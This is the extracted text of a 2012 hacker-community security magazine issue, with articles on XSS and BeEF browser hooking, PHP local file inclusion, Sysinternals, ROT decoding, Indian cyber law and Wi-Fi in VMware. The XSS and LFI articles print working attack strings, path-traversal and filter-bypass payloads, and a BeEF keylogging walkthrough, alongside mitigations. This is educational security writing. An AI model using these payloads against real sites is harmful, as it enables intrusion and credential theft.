ClubHack Magazine issue April 2012
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

ClubHack Magazine issue April 2012

  • 8,308 views
Uploaded on

From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with......

From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with we have an article on PHP based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and Matriux section.

Do send us your feedback on abhijeet@chmag.in this will help us improve further.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
8,308
On Slideshare
8,308
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
27
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Issue 27 – April 2012 | Page - 1
  • 2. Issue 27 – April 2012 | Page - 2
  • 3. Issue 27 – April 2012 | Page - 3XSS – The Burning issue JavaScript code on the victim’s browser. The impact of an XSS attack is only limitedin Web Application by the potency of the attacker’s JavaScript code.One of the largest portals was in news A quick look into the types of XSS:-recently when their website was exploitedby targeting XSS vulnerability. The person  Stored XSS Attackswho compromised the website has also  Reflected XSS Attacksnotified the portal with screenshots proving  DOM Based XSSsuccessful attack. Information Security chiefcalled an urgent meeting to discuss the issue Stored XSS - Stored XSS are those wherewith his entire team. He asked that we have the injected code is permanently stored ongot application security audit done form the target servers, such as in a database, in athird party before going live, we have also message forum, visitor log, comment field,trained our developers with secure coding etc. The victim then retrieves the maliciouspractices, then why this incident happened!! script from the server when it requests theThey went to other third party vendor and stored information.appointed them to audit the application.Audit team has found that XSS can be Reflected XSS - Reflected XSS are thosepossible from the “Custom XSS attack where the injected code is reflected off thevector” method. web server, such as in an error message, search result, or any other response thatIn this paper, I will be explaining two major includes some or all of the input sent to theaspects of Cross Site Scripting Attack: server as part of the request. Reflected XSS are delivered to victims via another route, 1. Tricky XSS such as in an e-mail message, or on some 2. Complete control over Users other web server. When a user is tricked browser – BeEF into clicking on a malicious link or submitting a specially crafted form, theCross Site scripting (XSS) is an attack in injected code travels to the vulnerable webwhich an attacker exploits vulnerability in server, which reflects the attack back to theapplication code and runs his own
  • 4. Issue 27 – April 2012 | Page - 4user’s browser. The browser then executes There are more common attack vectors butthe code because it came from a "trusted" we are not going to discuss those in thisserver. article, what we are going to discuss is out of box attacks which requires more patienceDOM based XSS - DOM Based XSS is an and more beer XSS attack wherein the attack payload isexecuted as a result of modifying the DOM What my personal experience is saying that,“environment” in the victim’s browser used XSS is more dependent on our observation,by the original client side script, so that the observation of how input gets stored or getclient side code runs in an “unexpected” reflected on the web page. In some cases Imanner. That is, the page itself (the HTTP have observed that developer uses a userresponse that is) does not change, but the input data in some client side JavaScriptclient side code contained in the page functions. Here they are getting trapped.executes differently due to the malicious What a developer will do, he will sanitizemodifications that have occurred in the only the USER FACING area (i.e. form), heDOM environment. will not take care of JavaScript functions. Let’s cover all these possible ways bySo, all this is the story about the types of example.XSS. Now let the real game begin. Custom Attack Vector – IXSS attack – more patience, morepossibility of attack. It’s been encountered many a times that user input values are getting used in clientRegular XSS attack strings: - side java script functions at clients’ machine. Generally developers focus more “><script on the GUI part, he will use best encoding >alert(document.cookie)</scri technique to encode values which are on the pt> GUI, but most of the time developer forgets ;alert(String.fromCharCode(8 about the function in which input value are 8,83,83))//;alert(String.fr being used in plain text. omCharCode(88,83,83))//";aler t(String.fromCharCode(88,83,8 In below example we can see the way XSS is 3))//";alert(String.fromChar successfully exploited in applications which Code(88,83,83))//-- take user input values in javascript ></SCRIPT>">><SCRIPT>alert(S functions. This Victim application uses the tring.fromCharCode(88,83,83)) application subdirectory name in the </SCRIPT> javascript function. For example, <SCRIPT http://www.victimsite.com is the url of the SRC=http://ha.ckers.org/xss.j application, then s></SCRIPT> http://www.victimsite.com/abc and <IMG http://www.victimsite.com/xyz/asd are the SRC="javascript:alert(XSS); sub directories of this application. "> JavaScript Function contains subdirectory names in a plain text.
  • 5. Issue 27 – April 2012 | Page - 5 ……/tickets-booking /search form + &t= + (((new Date()).getTime() - began_loading) / 1000);alert(document.cookie);// + &t= + (((new Date()).getTime() - began_loading) / 1000) Javascript function will treat this line asVictim application has “/tickets- continuation of the function line andbooking/search form” directory. Observe in execute the line, then it comes toabove screenshots that “/tickets- alert(document.cookie); it will execute thatbooking/search form” is being used at two command and ‘//’ will make rest of the lineplaces - one in javascript function and one as a comment. Hence XSS vulnerability getsin one of the hidden field of the GUI page. exploited easily in this application. We haveDeveloper has encoded special characters in tried all available attack vectors in thishidden field, but we can observe that text is application, but application has smartas it is in javascript function. encoding methods which encodes all the……/tickets-booking /search form special characters, but by this JAVASCRIPT+ &t= + (((new FUNCTION, attackers have exploited XSSDate()).getTime() - very easily.began_loading) / 1000) Custom Attack Vector – IIAbove line is as it is in javascript function. If This is another example of custom attackI write http://www.victimsite.com/abc/xyz vector. In the victim site, there is onein address bar then application responses hidden variable which has the value ofback with page not found error,but the referer page link. This value is being used byjavascript function will have value like one javascript function called OpenTicket.below: Legitimate value of the function line is as per below:……/abc/xyz + &t= + (((newDate()).getTime() - OpenTicket(TaxTDR.aspx,qw1234began_loading) / 1000) 5678u,9999999999,attack@atta cker.com,55555,devil,13/02Now we will see a custom attack vector for /2012this javascript function. I have appended 15:19:13,1,1,frmTempasad,‘ + &t= + (((new ,,,,SegmentID)Date()).getTime() -began_loading) /1000);alert(document.cookie);//in the URL. Now the javascript functionbecomes like following. By appending this attack vector, javascript function treats the line as a legitimate line and completes the function. Then function
  • 6. Issue 27 – April 2012 | Page - 6executes the document.write function and Style Attributethen it comments rest of the part. It’s been observed that STYLE attribute isOur aim is achieved here, XSS exploited ignored by some of the developers. Theysuccessfully.  block all the miscellaneous events like onclick, onmouseover etc. STYLE attributeOnmouseover XSS xss has limitation of supporting only get execute in IE, but that doesn’t mean we canOne form is available on victim website. ignore it.This is a part of registration form to registerfor some scheme on public facing page. Fill There is one form on victim website whichthe required information in the form, press expects the details of user. Developers havesubmit and capture the request in the web tried their level best to prevent XSS by allproxy tool. the possible methods, but totally ignored STYLE attribute. The form is processed with the required field and captures the values in proxy tool. Observe in the below screenshot, there is an appended STYLE attribute with the value of XSS attack vector in the input field.Append the “onmouseover” attack vectorinto the first name field. XSS is exploited successfully at the page.In response, application respond back witherror message that special characters arenot allowed. But when you click on the textbox of first name, you get surprised. Script There are many more victim websitesgets executed on the page. available on internet; it’s just a matter of how expert you are to catch the vulnerable point. For Reflected XSS, how your input gets reflected on the entire html page concerns a lot. Now we have successfully exploited XSS in web applications, let’s see how an attacker can take full control of victim’s browser using BeEF. “The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors.
  • 7. Issue 27 – April 2012 | Page - 7Unlike other security frameworks, BeEF Now, let’s start the attacker machines. Andfocuses on leveraging browser let’s initialize the BeEF on the machine.vulnerabilities to assess the security Below is the screenshot for the BeEF loginposture of a target. BeEF hooks one or page.more web browsers as beachheads for thelaunching of directed command modules.Each browser is likely to be within adifferent security context, and each contextmay provide a set of unique attack vectors.”– http://beefproject.com/Disclaimer: In this entire examplesection I have usedhttp://demo.testfire.net as a victimsite. This website is handled by IBM,and which contains number ofvulnerabilities by intention only.BeEF framework code is available athttp://code.google.com/p/beef/downloads/list. Anyone can download and install BeEF, After login into the BeEF framework, belowwhich requires web server, PHP and ruby is the first look or we can say home page ofinstallation as pre-requisites. Backtrack the initialized BeEF.(BT) has inbuilt setup of BeEF in it. BTusers can use it without any installation. Inthis article, I have used BT to demonstrate.Lets start it by a simple XSS example. Belowin the search filed pass the simple XSSvector, <script>alert(’XSS’)</script> Now the real game is about to begin. At the Victim side, earlier we have seen the normal XSS on demo site. Let’s apply the BeEF attack payload on the site.
  • 8. Issue 27 – April 2012 | Page - 8 Now entire browser is in attacker’s hand. He can check the system information of the created information.Simply apply this script code in the searchbox of the application. IP address is live IPaddress of a machine on which BeEF isconfigured. Hook.js will hook a browser intoBeEF.There are many other ways possible to forcevictim user to click on this payload, forexample by sending one image which hasmalicious link behind it, or by click jackingattack, or by email etc.When Victim execute BeEF payload, hewon’t see any changes on his side, but the atthe attacker side, he can see one ZOMBIEcreated.
  • 9. Issue 27 – April 2012 | Page - 9Attacker can execute JAVASCRIPTS fromhis end to victim’s browser. In belowscreenshot attacker is sending the javascriptalert box request. I have opened Facebook in Victim’s browser. BeEF plugin has detected that Facebook is initiated at the victim’s browser.Alert box get populated at the victim’s end.BeEF can also detect the social networkingsite status on the browser. Detect Socialnetworks module will detect if the victim’sbrowser is authenticated to Gmail,Facebook or Twitter.
  • 10. Issue 27 – April 2012 | Page - 10BeEF can also be useful to capture the best to prevent XSS by applying wellkeystrokes of the victim’s browser. I have encoding techniques, also do not allowopen one test page at victim’s browser insertion of any HTML tag or attribute inwhich has one textbox field. I have typed editable input option (i.e. textbox, listbox,“secret password” as the textbox value. textarea) and hidden variables. XSS attack may harm a lot; it all depends on how bad development skills of the application developer are and how good attackers’ skills are. At the BeEF framework, event Logs willhave an entry that was typed by the user onthe victim browser “secret password” in onetextbox. Ankit Nirmal ankit.nirmal@indusface.com Ankit Nirmal is a senior information security consultant at Indusface. Ankit has over 2 years of experience in information and application security. At Indusface, Ankit currently leads a team of security engineers and is conducting expansive research in the automate application security and code reviewThis was all about some tricky and advance process.stuff of XSS. Sometimes one wonders whatif attackers hook cyber café’s or library’s orpublicly available computer into theirBeEF!! All those who access these machineswill suffer a lot. One should try their level
  • 11. Issue 27 – April 2012 | Page - 11Sysinternals Suite TCP connections. TCP View is a subset of the NetStat program which provides a more informative and conveniently handled data. On downloading TCPView Tcpvcon and aSysinternals utilities are one of the best command-line version with the samefriends of administrator. Sysinternals was functionality comes along as a surprise gift.original created back in 1996 by MarkRussinovich and Bryce Cogswell and wasbought by Microsoft in 2006. Since then thecompany has continued to release new toolsand improve the existing ones.The Sysinternals suite consists of thefollowing different categories:  File and Disk Utilities  Networking Utilities  Process Utilities  Security Utilities  System Information Utilities  Miscellaneous Utilities Using TCPViewWe will look into some interesting utilitiesthat can come to our rescue in a handy. TCPView enumerates all the active TCP and UDP endpoints, resolving all IP addresses toTCPView v3.05 their domain name versions. To toggleTCPView is a program from Windows that between the displays of resolved names ashows a detail listings of all the TCP and toolbar button or menu item can be used. ByUDP endpoints on a system, including all default, TCPView updates every second, butthe local and remote addresses and state of
  • 12. Issue 27 – April 2012 | Page - 12you can use the Options|Refresh Rate menu integrated symbol support for eachitem to change the rate. operation, simultaneous logging to a file, and much more. It is a powerful utilityColor Coding: Endpoints which changes whose features will make it an importantstate from one update to the next are utility in one’s system troubleshooting andhighlighted in yellow; those which are malware hunting toolkit.deleted are shown in red, and newendpoints are shown in green. Overview of Process Monitor CapabilitiesOne can close any established connectionswhich are labeled as a Established by Process Monitor includes powerfulselecting File|Close Connections, or by monitoring and filtering capabilities,right-clicking on a connection and choosing including:Close Connections from the resultingcontext menu.  The data captured for operation input and output parameters is moreUsing Tcpvcon detailed.  The thread stacks are captured forTcpvcon is similar to use as the built-in each operation making it easier toWindows netstat utility. identify the root cause of any operation.Usage: tcpvcon [-a] [-c] [-n] [process name  Capture of process details, includingor PID] image path, command line, user and-a Show all endpoints (default is to session IDshow established TCP connections).  The event properties columns are configurable and moveable-c Print output as CSV.  The filters can be set for any data field, including fields which are not-n Dont resolve addresses. configured as columns  Advanced logging architecture scalesThe TCPView is a very useful and a handy to tens of millions of captured eventstool which gives the details in one view to and gigabytes of log datathe Administrator.  A process tree tool showsProcess Monitor v3.0 relationship of all processes referenced in a traceProcess Monitor is monitoring tool that  Easy viewing of process imageshows file system, Registry and informationprocess/thread activity. It is a combination  Boot time logging of all operations isof the features of two important possible.Sysinternals utilities, Filemon and Regmon.It adds an extensive list of enhancementsincluding rich and non-destructive filtering,comprehensive event properties suchsession IDs and user names, reliable processinformation, full thread stacks with
  • 13. Issue 27 – April 2012 | Page - 13 The Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files. http://technet.microsoft.com/en- us/sysinternals/bb842062 Author: Amit Kumar Amit is a System Engineer at Infosys.There are malwares present which analyzewhether any of the Sysinternal tools arerunning and before attack they make sure toclose it or change its own behavior. Thesetypes of malwares need to be analyzedseparately.If used properly the Sysinternals now calledas WinInternals can be very useful and canmake you work easier if used properly
  • 14. Issue 27 – April 2012 | Page - 14Decoding ROT usingthe Echo and TrCommands in yourLinux Terminal It would echo the word “ProjectX”=). Thus, the command is used to write its arguments to standard output. Another command thatROT which is known as the Caesar Cipher is we will be using is the tr command whicha kind of cryptography wherein encoding is translates characters. I saw in pastebindone by moving the letters in the alphabet different implementations in differentto its next letter. There are 25 possible ROT programming languages to decode ROT andsettings which covers the scope of letters A- that most of them are using the TRZ. Thus in ROT-1, A is equals to B and B is application so why not mixed it with theequals to C and so are the next letters but Z echo command? Alright here it goes, forwould go back to A. And so the ROT-1 example QspkfduY is ROT-1 and so I cancipher of ‘ProjectX‘is ‘QspkfduY‘. Thus, ROT decode it using echo “QspkfduY” | tr ‘b-za-= rotation. aB-ZA-A’ ‘a-zA-Z’.In this short write up we will be using theecho and tr bash commands in your Linuxterminal to encode or decode letters usingROT cipher. The ‘echo’ command is a built-in command in Bash in C shells whichrepeats the letters of words after it. Forexample:
  • 15. Issue 27 – April 2012 | Page - 15To decode the ROT-2 ProjectX which is“RtqlgevZ”, I can just change “b-za-aB-ZA-A” to “c-za-bC-ZA-B”. Jay Turla shipcodez@gmail.comThis list should help you to decode ROT-3 toROT-25: Jay Turla is a programming student and Infosec enthusiast from the Philippines.ROT-3 = tr d-za-cD-ZA-C ‘a-zA-Z’ He is one of the bloggers of ROOTCONROT-4 = tr e-za-dE-ZA-D ‘a-zA-Z’ (Philippine Hackers Conference) andROT-5 = tr f-za-eF-ZA-E ‘a-zA-Z’ The ProjectX Blog.ROT-6 = tr g-za-fG-ZA-F ‘a-zA-Z’ (http://www.theprojectxblog.net/)ROT-7 = tr h-za-gH-ZA-G ‘a-zA-Z’ROT-8 = tr i-za-hI-ZA-H ‘a-zA-Z’ROT-9 = tr -za-iJ-ZA-I ‘a-zA-Z’ROT-10 = tr k-za-jK-ZA-J ‘a-zA-Z’ROT-11 = tr l-za-kL-ZA-K ‘a-zA-Z’ROT-12 = tr m-za-lM-ZA-L ‘a-zA-Z’ROT-13 = tr n-za-mN-ZA-M ‘a-zA-Z’ROT-14 = tr o-za-nO-ZA-N ‘a-zA-Z’ROT-15 = tr p-za-oP-ZA-O ‘a-zA-Z’ROT-16 = tr q-za-pQ-ZA-P ‘a-zA-Z’ROT-17 = tr r-za-qR-ZA-Q ‘a-zA-Z’ROT-18 = tr s-za-rS-ZA-R ‘a-zA-Z’ROT-19 = tr t-za-sT-ZA-S ‘a-zA-Z’ROT-20 = tr u-za-tU-ZA-T ‘a-zA-Z’ROT-21 = tr v-za-uV-ZA-U ‘a-zA-Z’ROT-22 = tr w-za-vW-ZA-V ‘a-zA-Z’ROT-23 = tr x-za-wX-ZA-W ‘a-zA-Z’ROT-24 = tr y-za-xY-ZA-X ‘a-zA-Z’ROT-25 = tr z-za-yZ-ZA-Y ‘a-zA-Z’Take note of this technique, this guidemight be useful in CFP for other hackingand information security conventions outthere.
  • 16. Issue 27 – April 2012 | Page - 16 retaining or receiving a stolen computer resource or a communication device.Provisions of Sec. 66B The section reads as – Whoever dishonestly receives or retains any stolen computer resource or communicationPunishment for dishonestly device knowing or having reason to believereceiving stolen computer the same to be stolen computer resource or communication device, shall be punishedresource or communication with imprisonment of either description fordevice a term which may extend to three years orAs we have discussed in the earlier articles, with fine which may extend to rupees oneunder the amended Information Technology lakh or with both.Act, Section 66 has been completedamended to remove the definition of This section applies –hacking. Amendments also introduced a  Only if the person knows or has aseries of new provisions under Section 66 reason to believe that the computercovering almost all major cybercrime resource or the communicationincidents. device is stolen.  Any stolen computer resource, orIn this article, we will have a look at the to a person who dishonestly receivesprovisions of Sec. 66B which is about or retains.
  • 17. Issue 27 – April 2012 | Page - 17  Any stolen communication device.Here, term ‘computer resource’ means –‘Computer resource’ as defined underSection 2 (1)(k) of the IT Act, 2000Computer/computer, System/computernetwork/data/computer data base orsoftware.Hence, this provision can also be applied inthe event of ‘data theft’.Illustration - 1. Dinesh is working as an office boy in Calsoft systems Pvt. ltd. – a renowned IT company. Although his Sagar Rahurkar. work profile is low, he has a habit of contact@sagarrahurkar.com playing gambling, because of which he is always in need of money. One Sagar Rahurkar is a Law graduate, a day, he noticed that, Priyanka, who Certified Fraud Examiner (CFE) and a is a company secretary of Calsoft has certified Digital Evidence Analyst. forgot her iPad in the office. He has stolen the iPad and sold it to He specializes in Cyber Laws, Fraud Dheeraj, his friend who knew that examination, and Intellectual Property the iPad is stolen. Law related issues. He has conducted exclusive training programs for lawDheeraj can be prosecuted under this enforcement agencies like Police, Incomeprovision. He is a regular contributor to various 2. Dinesh is working as an office boy in Info-Sec magazines, where he writes on Calsoft systems Pvt. ltd. – a IT Law related issues. renowned IT company. Dinesh was Sagar Rahurkar can be contacted at infamous in the office as a greedy contact@sagarrahurkar.com person who is always behind money and lavish lifestyle. One day, he noticed that, Priyanka, who is a company secretary of Calsoft has forgot her laptop in the office. Dinesh stolen the laptop, took it home and given to his kids to play with.Dheeraj can be prosecuted under thisprovision.
  • 18. Issue 27 – April 2012 | Page - 18  Start VM Ware and boot Matriux.How to enable Wi-Fi  After you login and obtain an IP, ifon Matriux running you execute ifconfig -a, by default you will see only two interfaces i.e.,inside VMware eth0 and lo. 8:22 root@(none) /root# ifconfig –aIntroduction eth0 Link encap:Ethernet HWaddrOne of the most commonly asked question aa:00:04:00:0a:04on Matriux forums and IRC is how to enable inet addr:192.168.116.130and work with Wi-Fi on a Matriux instance Bcast:192.168.116.255running inside VMware or any other Mask:255.255.255.0 inet6 addr: fe80::a800:4ff:fe00:a04/64virtualization software. This tutorial will Scope:Linktake you step by step on how to do that. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1For this tutorial, I am running VMware® RX packets:34 errors:0 dropped:0Workstation on a Windows 7 Enterprise N overruns:0 frame:0 TX packets:119 errors:0 dropped:0Edition which is my Host machine. The overruns:0 carrier:0Matriux is (obviously) my guest operating collisions:0 txqueuelen:1000system running "Krypton" v1.2. I am using aD-Link DWA-125 Wireless N 150 USBAdapter for this tutorial.ProcedureThere are so many methods and approachesto enable Wi-Fi inside VMware /Virtualization environment. One of thepreferred approaches is explained below:  Note: Do not connect the Wireless Adapter now.  Start Windows 7 (or your Host OS).
  • 19. Issue 27 – April 2012 | Page - 19 collisions:0 txqueuelen:1000 RX bytes:4731 (4.6 KiB) TXbytes:11021 (10.7 KiB) Interrupt:19 Base address:0x2000lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436Metric:1 RX packets:52 errors:0 dropped:0 overruns:0 frame:0 TX packets:52 errors:0 dropped:0  Now Connect your USB Wi-Fi overruns:0 carrier:0 Adapter to your PC / Laptop. collisions:0 txqueuelen:0 RX bytes:6688 (6.5 KiB) TXbytes:6688  If (6.5 KiB) a Driver Software you get Installation error or information window (as shown below), click on the Close button to proceed. Figure 2  Also, if you move the mouse over the VM Status Bar USB icons, you can see the USB WiFi Device listed there (as shown below):Figure 1  Now the USB Wi-Fi device is Figure 3 available for VM.  You can verify this by switching to  Click (or right-click) on the USB Wifi VM and clicking on the menu VM -> Icon on the VM and click on Removable Devices. "Connect (Disconnect from Host)" as  You can see the USB Wi-Fi Device shown below: listed there as shown below: Figure 4
  • 20. Issue 27 – April 2012 | Page - 20 RX packets:107 errors:0 dropped:0  The following Message Window overruns:0 frame:0 should appear. Click OK to proceed. TX packets:300 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:11883 (11.6 KiB) TX bytes:20639 (20.1 KiB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 Figure 5 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING  If you look at the VM Status bar, you MTU:16436 Metric:1 RX packets:52 errors:0 dropped:0 can see that the USB WiFi Icon is overruns:0 frame:0 now active and highlighted as shown TX packets:52 errors:0 dropped:0 below: overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:6688 (6.5 KiB) TX bytes:6688 (6.5 KiB) wlan0 Link encap:Ethernet HWaddr f0:7d:68:62:b9:ab BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 Figure 6 overruns:0 frame:0 TX packets:0 errors:0 dropped:0  Now your USB WiFi adapter is ready overruns:0 carrier:0 for your Matriux WM and you can collisions:0 txqueuelen:1000 verify the same using the ifconfig -a RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) command. The output is displayed below: Conclusion:8:52 root@(none) /root# ifconfig -a The rest I leave it to your WiFi zeal. Noweth0 Link encap:Ethernet HWaddr you can do all your WiFi experiments with aa:00:04:00:0a:04 Matriux from within your Virtual inet addr:192.168.116.130 environment. Bcast:192.168.116.255 Join us for more discussion on Matriux and Mask:255.255.255.0 Wi-Fi topics at http://forum.matriux.com/ inet6 addr: fe80::a800:4ff:fe00:a04/64 or http://is-ra.org/forum/. Scope:Link Happy Learning  UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Team Matriux http://matriux.com
  • 21. Issue 27 – April 2012 | Page - 21Local File Inclusion e]; include(board/.$GET_[pag }What is Local File Inclusion? ?>Local File Inclusion is a method in PHP for In itself functions such as include() are notincluding Local files from the Local web vulnerable but it’s wrong use can causeserver itself. serious security issue.This becomes vulnerability when the pages In the above script the include function triesto be included from web servers are not to includes a file from the boardsanitized properly and to exploit this subdirectory. In this code the developer isvulnerability attacker can send modified not sanitizing the variable of page forhttp request to the server using a web characters such as periods and slashes (../browser. which is used for moving one directory up) and also doesnt checks if the file is a webFor example if a developer is using a server system file which can allow thevariable from URL (i.e. GET variable) for attacker to include malicious file from thecalling specific file on the server for web server filesystem resulting into criticalinclusion for example the URL is information disclosure or arbitrary code/board/index.php?page=contactus the execution.sample php code for this may be: For eg. if attacker modifies the page url to:<?php www.site.com/board/index.php?page=../../. if($_GET[page]!=) ./etc/passwd { The above URL will cause PHP to include /etc/passwd file
  • 22. Issue 27 – April 2012 | Page - 22This modified URL will disclose all the list In the above environment variables we canof users on the server. control some of the environment variables and alter them, such aswww.site.com/board/index.php?page=../../. HTTP_USER_AGENT=Mozilla/5.0./proc/self/environ (Windows NT 6.1; rv:8.0) which we can tamper and put php script to gain shellThe above URL will cause php to includeenvironment variables which looks as access.follows: Following are some of the PHP functionsPATH=/usr/local/bin:/usr/bin:/bi used for file inclusion:nDOCUMENT_ROOT=/hsphere/local/ho include();me/c242949/site.comHTTP_ACCEPT=text/html,application/xhtml+xml,a require();pplication/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859- include_once();1,utf- require_once();8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCODING=gzip, Some developers may use their own code fordeflateHTTP_ACCEPT_LANGUAGE=en- filtering these attacks as follows:us,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_COOKIE=PHPSESSID=1662i <?phpmbqqot4jq099sij0rhfr3HTTP_HOST=s if(isset($_GET[page]))ite.comHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; rv:8.0) {Gecko/20100101Firefox/8.0REDIRECT_QUERY_STRING include(board/.str_replace("..=filename=/proc/./self/./environ /",,($_GET[page]))..php);REDIRECT_STATUS=200REDIRECT_URL= }/runner.phpREMOTE_ADDR=116.202.164.155REMOTE_PORT=49376SCRIPT_FI ?>LENAME=/hsphere/shared/php5/bin/phpSERVER_ADDR=98.131.116.1SERVE Beware!! The above code seems to be a veryR_ADMIN=webmaster@site.comSERVER a good idea but such php filters can be_NAME=www.site.comSERVER_PORT=80 bypassed easily by making the followingSERVER_SOFTWARE=ApacheGATEWAY_IN request:TERFACE=CGI/1.1SERVER_PROTOCOL=H "index.php?page=....//....//....TTP/1.1REQUEST_METHOD=GETQUERY_S //etc/passwd%00"TRING=filename=/proc/./self/./environREQUEST_URI=/runner.php?filename=/proc/./self/./environSCRIPT_NAME=/php5bin/phpPATH_INFO=/runner.phpPATH_TRANSLATED=/hsphere/local/home/c242949/site.com/runner.php
  • 23. Issue 27 – April 2012 | Page - 23Securing Local File Inclusion case "product":Vulnerabilities: include("product.php");1. Always try to use if else statement in following way. For example: default: <?php include("index.php"); if (isset($_GET[page])) } { } else if($_GET[page]=="contact") { { include("index.php"); include("contact.php"); } } ?> elseif($_GET[page]=="produc 2. In the below code: t") { <?php include("product.php"); if($_GET[page]!= } { include(board/.urlencode( else $GET_[page]..php); { } include("index.php"); ?> } It will encode the attackers request } "index.php?page=../../../etc/ passwd%00" and result in the else following error: { Warning:include(page/..%2F..% include("index.php"); 2F..%2F..%2F..%2Fetc%2Fpasswd } %00.php) [function.include]: ?> failed to open stream: No such file or directory Or similarly you can use switch case: 3. Use realpath() function in the code: <?php <?php if(isset($_GET[page])) { include(board/.realpath($_GET[page] switch($_GET[page]) ..php); { case "contact": ?> include("contact.php");
  • 24. Issue 27 – April 2012 | Page - 24 The Real path function returns canonicalized absolute pathname on success. The resulting path will have no symbolic link, /./ or /../ components thus defending the attack successfully.4. A good way for restricting the inclusion of /proc/self/environ is to see that Apache server doesnt have access to enviroment variables. We can change the apaches shell in /etc/passwd to /sbin/nologin in following way : Vikram Pawar pawarvikram666@gmail.com apache:x:26:26:Apache:/var/ww w:/sbin/nologin Vikram Pawar is a hacking and security enthusiast. Vikram is currently This restricts apache server to access pursuing Bachelor’s Degree in environmental variables. Computer Science and Engineering from G.H. Raisoni institute of engineering and technology (Pune).
  • 25. Issue 27 – April 2012 | Page - 25